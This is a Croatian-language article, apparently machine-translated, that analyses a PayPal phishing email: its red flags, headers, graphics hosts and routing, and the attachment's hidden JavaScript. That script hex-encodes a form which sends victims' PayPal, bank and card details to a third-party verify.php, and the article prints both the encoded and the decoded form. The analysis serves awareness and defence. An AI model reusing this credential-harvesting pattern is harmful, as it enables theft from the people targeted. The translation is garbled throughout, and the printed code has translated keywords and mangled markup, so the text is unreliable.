10Sep
U današnjem svijetu gdje su svi podaci dostupni, phishing je jedan od najpopularnijih i najstrašnijih napada na mreži, jer uvijek možete očistiti virus, ali ako ste ukradeni bankovni podaci, u nevolji ste. Ovo je slom jednog takvog napada koji smo primili.
Nemojte misliti da su vaši bankovni detalji važni: nakon svega, ako netko dobije kontrolu nad prijavom na račun, oni ne samo da znaju informacije sadržane na tom računu, već i vjerojatnost da se isti podaci za prijavu mogu koristiti na različitimostali računi. Ako ugroze vaš račun e-pošte, mogu vratiti sve vaše druge zaporke.
Dakle, uz čuvanje jake i različite lozinke, uvijek morate biti u potrazi za lažnim e-porukama koji se masquerading kao pravi stvar. Dok su većina pokušaja krađe identiteta amaterski, neki su vrlo uvjerljivi pa je važno razumjeti kako ih prepoznati na površinskoj razini, kao i način na koji rade pod kapuljačom.
Image by asirap
Ispitivanje što je uobičajeno
Naš primjer e-pošte, kao i većina pokušaja krađe identiteta, "obavještava" vas o aktivnostima na vašem PayPal računu koji bi, u normalnim okolnostima, bio alarmantan. Zato je poziv na radnju da potvrdite / vratite svoj račun tako što ćete poslati samo sve pojedinosti o osobnim podacima o kojima se možete sjetiti. Opet, ovo je prilično formulirano.
Iako postoje iznimke, prilično je svaka poruka e-pošte za krađu identiteta i prijevara napunjena crvenim zastavama izravno u samoj poruci.Čak i ako je tekst uvjerljiv, obično možete pronaći mnoge pogreške koje se nalaze u cijelom tijelu poruke, što ukazuje da poruka nije legit.
Tijelo poruke
Na prvi pogled, ovo je jedna od boljih poruka e-pošte za phishing koje sam vidio. Nema pravopisnih ili gramatičkih pogrešaka, a glagoljica čita prema onome što biste očekivali. Međutim, postoji nekoliko crvenih zastavica koje možete vidjeti kada malo bolje razmotrite sadržaj.
- "Paypal" - Točan slučaj je "PayPal"( kapital P).Možete vidjeti kako se obje varijacije koriste u poruci. Tvrtke su vrlo inteligentne s njihovim brandiranjem, pa je dvojbeno da bi nešto slično prolazilo kroz proces proofinga.
- "dopušta ActiveX" - Koliko puta ste vidjeli pravu web-baziranu tvrtku veličina Paypal koristi vlasničku komponentu koja radi samo na jednom pregledniku, pogotovo kada podržavaju više preglednika? Naravno, negdje tamo neka tvrtka to radi, ali ovo je crvena zastava.
- "sigurno". - Primijetite kako se ova riječ ne podudara s marginama s ostatkom teksta odlomka.Čak i ako malo više rastegnem prozor, ne pokriva se ili prostor ispravno.
- "Paypal" - prostor prije uskličnika izgleda neugodno. Samo još jedan trenutak koji sam siguran da ne bi bio u pravoj e-pošti.
- "PayPal-Account Update Form.pdf.htm" - Zašto bi Paypal priložio "PDF" pogotovo kada bi se mogli povezati na stranicu na njihovoj web stranici? Osim toga, zašto bi pokušali prikriti HTML datoteku kao PDF?Ovo je najveća crvena zastava svih njih.
Zaglavlje poruke
Kada pogledate zaglavlje poruke, pojavljuje se još nekoliko crvenih zastavica:
- Adresa s adrese [email protected]. Adresa
- nedostaje. Nisam to ispraznio, jednostavno nije dio standardne zaglavlja poruke. Obično tvrtka koja ima vaše ime personalizira vam e-poruku.
Prilog
Kad otvorim privitak, odmah možete vidjeti da izgled nije točan jer nedostaje informacija o stilu. Opet, zašto bi PayPal poslao e-poštu u HTML obrazac kad bi vam jednostavno mogli dati vezu na svojoj web stranici?
Napomena: koristili smo ugrađeni preglednik HTML privitaka za to, no preporučili bismo da ne otvarate privitke od zlonamjernih korisnika. Nikada. Ikad. Oni često sadrže eksploatacije koje će instalirati trojance na vaše računalo kako bi ukrali podatke o vašem računu.
Pomicanje dolje malo više možete vidjeti da ovaj obrazac traži ne samo naše podatke za prijavu PayPal, već i bankovne i kreditne kartice. Neke su slike slomljene.
Očito je da ovaj pokušaj krađe identiteta ide sve poslije svega.
Tehnička podjela
Iako bi trebalo biti prilično jasno na temelju onoga što je očito da je to pokušaj krađe identiteta, sada ćemo razbiti tehničku sastavnicu e-pošte i vidjeti što možemo pronaći.
Informacije iz priloga
Prva stvar koju treba pogledati je izvor HTML obrasca privitka koji je ono što podnosi podatke na lažno mjesto.
Kada brzo pregledavate izvor, svi se veze pojavljuju važeći kako upućuju na "paypal.com" ili "paypalobjects.com" koji su i legitimni.
Sada ćemo pogledati neke osnovne informacije o stranicama koje Firefox prikuplja na stranici.
Kao što možete vidjeti, neke od grafika su izvučene iz domena "blessedtobe.com", "goodhealthpharmacy.com" i "pic-upload.de" umjesto legit PayPal domena.
Informacije sa zaglavlja e-pošte
Dalje ćemo pogledati zaglavlja neobrađenih poruka e-pošte. Gmail to čini dostupnim putem opcije Prikaži izvorni izbornik u poruci.
Gledajući informacije o zaglavlju za izvornu poruku, možete vidjeti da je ova poruka sastavljena pomoću programa Outlook Express 6. Sumnjam da PayPal ima nekoga na osoblje koje šalje svaku od tih poruka ručno putem zastarjelog klijenta e-pošte.
Sada gledajući podatke o usmjeravanju, možemo vidjeti IP adresu i pošiljatelja i poslužitelja za prosljeđivanje e-pošte.
IP adresa "Korisnik" je izvorni pošiljatelj. Brzo pretraživanje IP informacija može se vidjeti da je IP slanja u Njemačkoj.
I kad pogledamo posredničku poštu( mail.itak.at), IP adresa možemo vidjeti da je to ISP sa sjedištem u Austriji. Sumnjam da PayPal rutaje svoje e-poruke izravno putem ISP-a u Austriji kada imaju masivnu farmu poslužitelja koja bi mogla lako nositi taj zadatak.
Gdje se podaci kreću?
Dakle, jasno smo utvrdili da je ovo e-mail krađe identiteta i prikupio neke informacije o tome gdje je poruka potekla, no što je s tim gdje se šalju vaši podaci?
Da biste to vidjeli, prvo moramo spremiti privitak HTM učiniti našu radnu površinu i otvoriti u uređivaču teksta. Pomicanje po njemu čini se da je sve u redu, osim kada dođemo do sumnjivog bloka Javascript.
Izdvajanje punog izvora posljednjeg bloka JavaScripta, vidimo:
& lt; script language = "JavaScript" type = "text / javascript" & gt;
// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
var I, y, x =”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”, y =”jer( i = 0; i & lt; x.length, i + 2){ y + prihvaćanje( '%' + x.substr( i, 2))} document.write( y);
& lt; / script & gt;
Anytime you see veliki razmaknute niz naizgled slučajnih slova i brojeva ugrađenih u blok Java, to je obično nešto sumnjivo. Gledajući kôd, varijabla "x" postavljena je na taj veliki niz, a zatim dekodiran u varijablu "y".Konačni rezultat varijable "y" tada se upisuje u dokument kao HTML.
Od velikog niza se sastoji od brojeva 0-9 i slova AF, to je najvjerojatnije kodirani putem jednostavnog ASCII heksadecimalni pretvorbe:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
prevodi:
& lt; ime tvore =”glavni” id =”glavni”method = "post" action = "http: //www.dexposure.net/bbs/data/ verify.php" & gt;
Nije slučajno da se ovo dekodira u valjanu oznaku HTML obrasca koja šalje rezultate ne na PayPal, već na mjesto skitnica.
Osim toga, kada vidite HTML izvor obrasca, vidjet ćete da ova oznaka obrasca nije vidljiva jer se dinamički generira putem Javascripta. Ovo je pametan način sakrivanja onoga što HTML zapravo radi ako bi netko jednostavno pogledao generirani izvor privitka( kao što smo ranije učinili) za razliku od otvaranja privitka izravno u uređivaču teksta.
Pokretanje brzog tko je na mjestu na kojem se vrijeđa možemo vidjeti da je ovo domena domaćin na popularnom web hostu, 1and1.
Ono što se ističe je da domena koristi čitko ime( za razliku od nešto poput "dfh3sjhskjhw.net") i domena je registrirana 4 godine. Zbog toga vjerujem da je ova domena oteta i upotrijebljena kao pijun u tom pokušaju krađe identiteta.
Cinizam je dobra obrana
Kad se radi o sigurnom online, nikada ne boli da ima dobar cinizam.
Dok sam siguran da ima više crvenih zastava u primjeru e-pošte, ono što smo gore ukazali su indikatori koje smo vidjeli nakon samo nekoliko minuta ispitivanja. Hipotetski, ako je površinska razina e-pošte imitirala svoje legitimne kolege 100%, tehnička analiza još uvijek bi otkrila svoju pravu prirodu. Zato je uvoz biti u mogućnosti ispitati i ono što možete i ne možete vidjeti.